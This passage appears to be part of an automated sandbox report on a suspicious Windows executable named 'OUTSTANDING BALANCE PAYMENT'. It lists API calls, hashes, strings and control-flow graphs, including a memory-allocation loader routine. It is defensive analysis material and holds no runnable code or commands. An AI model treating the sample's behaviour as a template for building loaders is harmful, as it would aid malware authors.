                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 687793809e144c8ce9218c5bf22d244f1bfd8fe2ae411bcc9f84af891ccd3c7b
                                                          • Instruction ID: adfccac427a2c2e09ae4e28af24420087aee63cf0f9460e6f958c48adbda2ab8
                                                          • Opcode Fuzzy Hash: 687793809e144c8ce9218c5bf22d244f1bfd8fe2ae411bcc9f84af891ccd3c7b
                                                          • Instruction Fuzzy Hash: 75E0DF71818410AB82206738EC8D8EA37ACEE06339F10074AF872D21E0FBB0ED1096D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID:
                                                          • API String ID: 3964851224-0
                                                          • Opcode ID: 3f67cfb63dece83eddadb84e9784da0b887669f9b321e02b1eeb2015197509f9
                                                          • Instruction ID: a0e8fa7361057fb15949158474d31337158e379a2f73cf277e674e9b0f31d61c
                                                          • Opcode Fuzzy Hash: 3f67cfb63dece83eddadb84e9784da0b887669f9b321e02b1eeb2015197509f9
                                                          • Instruction Fuzzy Hash: B99268706083419FD724DF18C480B6ABBE1FF88704F14889DE9AA8B362D775ED45DB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6dea855ea3996d3990a8e2a6e46068c78a45416d3b35dbefb4b95a29986e21c0
                                                          • Instruction ID: 85ff1f3a6102204090a52e4e34e61bcf91c302189ed9fc9bf88209cb57dffc09
                                                          • Opcode Fuzzy Hash: 6dea855ea3996d3990a8e2a6e46068c78a45416d3b35dbefb4b95a29986e21c0
                                                          • Instruction Fuzzy Hash: 88229E789042068FDB24DF58C490ABEB7F1FF14304F1481AAE96A9B351E739ED45CB91
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6E959
                                                          • timeGetTime.WINMM ref: 00B6EBFA
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B6ED2E
                                                          • TranslateMessage.USER32(?), ref: 00B6ED3F
                                                          • DispatchMessageW.USER32(?), ref: 00B6ED4A
                                                          • LockWindowUpdate.USER32(00000000), ref: 00B6ED79
                                                          • DestroyWindow.USER32 ref: 00B6ED85
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B6ED9F
                                                          • Sleep.KERNEL32(0000000A), ref: 00BD5270
                                                          • TranslateMessage.USER32(?), ref: 00BD59F7
                                                          • DispatchMessageW.USER32(?), ref: 00BD5A05
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BD5A19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                          • API String ID: 2641332412-570651680
                                                          • Opcode ID: cb41845b7dd3e70e9ed01201d73d56ab2f4782954e0c7178b26c86424d104eab
                                                          • Instruction ID: 397e38bddd8a11f5fa72d7381fa9f24a6c8beaf0595459d85472ae51191ad1e9
                                                          • Opcode Fuzzy Hash: cb41845b7dd3e70e9ed01201d73d56ab2f4782954e0c7178b26c86424d104eab
                                                          • Instruction Fuzzy Hash: 5962B470504340DFEB24DF24C885BAAB7E4FF54304F1849AEF95A8B292DBB5D844CB52
                                                          APIs
                                                          • ___createFile.LIBCMT ref: 00B95EC3
                                                          • ___createFile.LIBCMT ref: 00B95F04
                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B95F2D
                                                          • __dosmaperr.LIBCMT ref: 00B95F34
                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00B95F47
                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B95F6A
                                                          • __dosmaperr.LIBCMT ref: 00B95F73
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B95F7C
                                                          • __set_osfhnd.LIBCMT ref: 00B95FAC
                                                          • __lseeki64_nolock.LIBCMT ref: 00B96016
                                                          • __close_nolock.LIBCMT ref: 00B9603C
                                                          • __chsize_nolock.LIBCMT ref: 00B9606C
                                                          • __lseeki64_nolock.LIBCMT ref: 00B9607E
                                                          • __lseeki64_nolock.LIBCMT ref: 00B96176
                                                          • __lseeki64_nolock.LIBCMT ref: 00B9618B
                                                          • __close_nolock.LIBCMT ref: 00B961EB
                                                            • Part of subcall function 00B8EA9C: CloseHandle.KERNELBASE(00000000,00C0EEF4,00000000,?,00B96041,00C0EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B8EAEC
                                                            • Part of subcall function 00B8EA9C: GetLastError.KERNEL32(?,00B96041,00C0EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B8EAF6
                                                            • Part of subcall function 00B8EA9C: __free_osfhnd.LIBCMT ref: 00B8EB03
                                                            • Part of subcall function 00B8EA9C: __dosmaperr.LIBCMT ref: 00B8EB25
                                                            • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                          • __lseeki64_nolock.LIBCMT ref: 00B9620D
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B96342
                                                          • ___createFile.LIBCMT ref: 00B96361
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B9636E
                                                          • __dosmaperr.LIBCMT ref: 00B96375
                                                          • __free_osfhnd.LIBCMT ref: 00B96395
                                                          • __invoke_watson.LIBCMT ref: 00B963C3
                                                          • __wsopen_helper.LIBCMT ref: 00B963DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                          • String ID: @
                                                          • API String ID: 3896587723-2766056989
                                                          • Opcode ID: 3b823d33087142190223688e97e30ca2d8a95ca34e8d307af385a1bf9a3b870b
                                                          • Instruction ID: 7b48c4b3cda3e8ac207b031daccb322435c15d7cd01a8d687cb58cf51a2ddcc9
                                                          • Opcode Fuzzy Hash: 3b823d33087142190223688e97e30ca2d8a95ca34e8d307af385a1bf9a3b870b
                                                          • Instruction Fuzzy Hash: 1922267190460A9BEF2A9F68DC85BBD7BE1EF11324F2442F9E9219B2E2C7358D40C751

                                                          Control-flow Graph

                                                          APIs
                                                          • _wcscpy.LIBCMT ref: 00BAFA96
                                                          • _wcschr.LIBCMT ref: 00BAFAA4
                                                          • _wcscpy.LIBCMT ref: 00BAFABB
                                                          • _wcscat.LIBCMT ref: 00BAFACA
                                                          • _wcscat.LIBCMT ref: 00BAFAE8
                                                          • _wcscpy.LIBCMT ref: 00BAFB09
                                                          • __wsplitpath.LIBCMT ref: 00BAFBE6
                                                          • _wcscpy.LIBCMT ref: 00BAFC0B
                                                          • _wcscpy.LIBCMT ref: 00BAFC1D
                                                          • _wcscpy.LIBCMT ref: 00BAFC32
                                                          • _wcscat.LIBCMT ref: 00BAFC47
                                                          • _wcscat.LIBCMT ref: 00BAFC59
                                                          • _wcscat.LIBCMT ref: 00BAFC6E
                                                            • Part of subcall function 00BABFA4: _wcscmp.LIBCMT ref: 00BAC03E
                                                            • Part of subcall function 00BABFA4: __wsplitpath.LIBCMT ref: 00BAC083
                                                            • Part of subcall function 00BABFA4: _wcscpy.LIBCMT ref: 00BAC096
                                                            • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0A9
                                                            • Part of subcall function 00BABFA4: __wsplitpath.LIBCMT ref: 00BAC0CE
                                                            • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0E4
                                                            • Part of subcall function 00BABFA4: _wcscat.LIBCMT ref: 00BAC0F7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 2955681530-2806939583
                                                          • Opcode ID: bce6c7de9f92e7dc292005bde4c26b8cf3ffbd252ae78ae764624b5acfd5838f
                                                          • Instruction ID: 36543d71b3081a882a2cda063e31392378a3fdd637edfd151cceeace6ddd93fc
                                                          • Opcode Fuzzy Hash: bce6c7de9f92e7dc292005bde4c26b8cf3ffbd252ae78ae764624b5acfd5838f
                                                          • Instruction Fuzzy Hash: 3691B272508305AFCB20FF54C851FAAB3E8FF55310F0448A9F959972A1DB35EA48CB96

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B63F86
                                                          • RegisterClassExW.USER32(00000030), ref: 00B63FB0
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B63FC1
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00B63FDE
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B63FEE
                                                          • LoadIconW.USER32(000000A9), ref: 00B64004
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B64013
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 497e97b8044c233628e51067f367e9539b232907738a5d9d6a6fdf9e8de2f0e2
                                                          • Instruction ID: 97ab610db445df7822958ef78efe716a4f242b120d901e3c2fdda30600e71fbb
                                                          • Opcode Fuzzy Hash: 497e97b8044c233628e51067f367e9539b232907738a5d9d6a6fdf9e8de2f0e2
                                                          • Instruction Fuzzy Hash: CB21F7B5910348AFDB10DFA4E889BCDBBB5FB18700F04421AFA11AB6A0DBB105458F90

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00BABDB4: __time64.LIBCMT ref: 00BABDBE
                                                            • Part of subcall function 00B64517: _fseek.LIBCMT ref: 00B6452F
                                                          • __wsplitpath.LIBCMT ref: 00BAC083
                                                            • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                          • _wcscpy.LIBCMT ref: 00BAC096
                                                          • _wcscat.LIBCMT ref: 00BAC0A9
                                                          • __wsplitpath.LIBCMT ref: 00BAC0CE
                                                          • _wcscat.LIBCMT ref: 00BAC0E4
                                                          • _wcscat.LIBCMT ref: 00BAC0F7
                                                          • _wcscmp.LIBCMT ref: 00BAC03E
                                                            • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC65D
                                                            • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC670
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00BAC2A1
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BAC338
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BAC34E
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BAC35F
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BAC371
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                          • String ID:
                                                          • API String ID: 2378138488-0
                                                          • Opcode ID: 00093fcfb67de048ef7eb5b0f74ad0a7831cf2bcac341b7a915e3be3c36965bf
                                                          • Instruction ID: 99dbe71ec666097dbfe7ca37a895fd8a467c1470a2cc95af079509467a1843e9
                                                          • Opcode Fuzzy Hash: 00093fcfb67de048ef7eb5b0f74ad0a7831cf2bcac341b7a915e3be3c36965bf
                                                          • Instruction Fuzzy Hash: 1EC109B1A00219AADF11DF95CC81EEEBBFDEF59310F0040EAE609E6151DB749A448F65

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 957 b63742-b63762 959 b63764-b63767 957->959 960 b637c2-b637c4 957->960 961 b637c8 959->961 962 b63769-b63770 959->962 960->959 963 b637c6 960->963 967 b637ce-b637d1 961->967 968 bd1e00-bd1e2e call b62ff6 call b7e312 961->968 964 b63776-b6377b 962->964 965 b6382c-b63834 PostQuitMessage 962->965 966 b637ab-b637b3 DefWindowProcW 963->966 970 bd1e88-bd1e9c call ba4ddd 964->970 971 b63781-b63783 964->971 972 b637f2-b637f4 965->972 973 b637b9-b637bf 966->973 974 b637f6-b6381d SetTimer RegisterWindowMessageW 967->974 975 b637d3-b637d4 967->975 1002 bd1e33-bd1e3a 968->1002 970->972 996 bd1ea2 970->996 977 b63836-b63840 call b7eb83 971->977 978 b63789-b6378e 971->978 972->973 974->972 979 b6381f-b6382a CreatePopupMenu 974->979 981 b637da-b637ed KillTimer call b63847 call b6390f 975->981 982 bd1da3-bd1da6 975->982 997 b63845 977->997 985 bd1e6d-bd1e74 978->985 986 b63794-b63799 978->986 979->972 981->972 989 bd1ddc-bd1dfb MoveWindow 982->989 990 bd1da8-bd1daa 982->990 985->966 992 bd1e7a-bd1e83 call b9a5f3 985->992 994 bd1e58-bd1e68 call ba55bd 986->994 995 b6379f-b637a5 986->995 989->972 998 bd1dac-bd1daf 990->998 999 bd1dcb-bd1dd7 SetFocus 990->999 992->966 994->972 995->966 995->1002 996->966 997->972 998->995 1003 bd1db5-bd1dc6 call b62ff6 998->1003 999->972 1002->966 1007 bd1e40-bd1e53 call b63847 call b64ffc 1002->1007 1003->972 1007->966
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00B637B3
                                                          • KillTimer.USER32(?,00000001), ref: 00B637DD
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B63800
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B6380B
                                                          • CreatePopupMenu.USER32 ref: 00B6381F
                                                          • PostQuitMessage.USER32(00000000), ref: 00B6382E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 9004973f7475b9914a92fdceb1185888b136ce3f36abdb7e242fdd79fbfe9024
                                                          • Instruction ID: ff1bcafb30368b54bdc8ecb2c6b7d560429a5e1c106187e9951c198c350d6f87
                                                          • Opcode Fuzzy Hash: 9004973f7475b9914a92fdceb1185888b136ce3f36abdb7e242fdd79fbfe9024
                                                          • Instruction Fuzzy Hash: FA416AF1214289AFDB205F28EC8AFBE36D5FB50B00F0801A9FD06D7591DF699E509761

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B63E79
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B63E88
                                                          • LoadIconW.USER32(00000063), ref: 00B63E9E
                                                          • LoadIconW.USER32(000000A4), ref: 00B63EB0
                                                          • LoadIconW.USER32(000000A2), ref: 00B63EC2
                                                            • Part of subcall function 00B64024: LoadImageW.USER32(00B60000,00000063,00000001,00000010,00000010,00000000), ref: 00B64048
                                                          • RegisterClassExW.USER32(?), ref: 00B63F30
                                                            • Part of subcall function 00B63F53: GetSysColorBrush.USER32(0000000F), ref: 00B63F86
                                                            • Part of subcall function 00B63F53: RegisterClassExW.USER32(00000030), ref: 00B63FB0
                                                            • Part of subcall function 00B63F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B63FC1
                                                            • Part of subcall function 00B63F53: InitCommonControlsEx.COMCTL32(?), ref: 00B63FDE
                                                            • Part of subcall function 00B63F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B63FEE
                                                            • Part of subcall function 00B63F53: LoadIconW.USER32(000000A9), ref: 00B64004
                                                            • Part of subcall function 00B63F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B64013
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: 83ef76d6117f36245a7026c2b5d0f00bdf80634f0f25c76d6ca7246e0e77ff39
                                                          • Instruction ID: caa822d97429b3423788e2d144f9744dc22fb9d0a2a7f5f57f5ca110e5d2f945
                                                          • Opcode Fuzzy Hash: 83ef76d6117f36245a7026c2b5d0f00bdf80634f0f25c76d6ca7246e0e77ff39
                                                          • Instruction Fuzzy Hash: 79216DB0D10304AFCB20DFA9EC46B9DBFF5FB58720F04416AEA04A76A0D7B54A518F95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1021 16b6628-16b66d6 call 16b4028 1024 16b66dd-16b6703 call 16b7538 CreateFileW 1021->1024 1027 16b670a-16b671a 1024->1027 1028 16b6705 1024->1028 1033 16b671c 1027->1033 1034 16b6721-16b673b VirtualAlloc 1027->1034 1029 16b6855-16b6859 1028->1029 1031 16b689b-16b689e 1029->1031 1032 16b685b-16b685f 1029->1032 1035 16b68a1-16b68a8 1031->1035 1036 16b686b-16b686f 1032->1036 1037 16b6861-16b6864 1032->1037 1033->1029 1040 16b673d 1034->1040 1041 16b6742-16b6759 ReadFile 1034->1041 1042 16b68aa-16b68b5 1035->1042 1043 16b68fd-16b6912 1035->1043 1038 16b687f-16b6883 1036->1038 1039 16b6871-16b687b 1036->1039 1037->1036 1046 16b6893 1038->1046 1047 16b6885-16b688f 1038->1047 1039->1038 1040->1029 1048 16b675b 1041->1048 1049 16b6760-16b67a0 VirtualAlloc 1041->1049 1050 16b68b9-16b68c5 1042->1050 1051 16b68b7 1042->1051 1044 16b6922-16b692a 1043->1044 1045 16b6914-16b691f VirtualFree 1043->1045 1045->1044 1046->1031 1047->1046 1048->1029 1052 16b67a2 1049->1052 1053 16b67a7-16b67c2 call 16b7788 1049->1053 1054 16b68d9-16b68e5 1050->1054 1055 16b68c7-16b68d7 1050->1055 1051->1043 1052->1029 1061 16b67cd-16b67d7 1053->1061 1058 16b68f2-16b68f8 1054->1058 1059 16b68e7-16b68f0 1054->1059 1057 16b68fb 1055->1057 1057->1035 1058->1057 1059->1057 1062 16b680a-16b681e call 16b7598 1061->1062 1063 16b67d9-16b6808 call 16b7788 1061->1063 1069 16b6822-16b6826 1062->1069 1070 16b6820 1062->1070 1063->1061 1071 16b6828-16b682c CloseHandle 1069->1071 1072 16b6832-16b6836 1069->1072 1070->1029 1071->1072 1073 16b6838-16b6843 VirtualFree 1072->1073 1074 16b6846-16b684f 1072->1074 1073->1074 1074->1024 1074->1029
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 016B66F9
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 016B691F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2035330255.00000000016B4000.00000040.00000020.00020000.00000000.sdmp, Offset: 016B4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16b4000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                          • Instruction ID: 2f5d4faec5b3e917635c4d8fe463be3543098468e9491cfad530e5624851e372
                                                          • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                          • Instruction Fuzzy Hash: FCA10874E00209EBDF14CFA4C894BEEBBB5BF48304F208569E615BB281D7759A81CF65

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1130 b649fb-b64a25 call b6bcce RegOpenKeyExW 1133 bd41cc-bd41e3 RegQueryValueExW 1130->1133 1134 b64a2b-b64a2f 1130->1134 1135 bd41e5-bd4222 call b7f4ea call b647b7 RegQueryValueExW 1133->1135 1136 bd4246-bd424f RegCloseKey 1133->1136 1141 bd423d-bd4245 call b647e2 1135->1141 1142 bd4224-bd423b call b66a63 1135->1142 1141->1136 1142->1141
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00B64A1D
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BD41DB
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BD421A
                                                          • RegCloseKey.ADVAPI32(?), ref: 00BD4249
                                                          Strings
                                                          Memory Dump Source
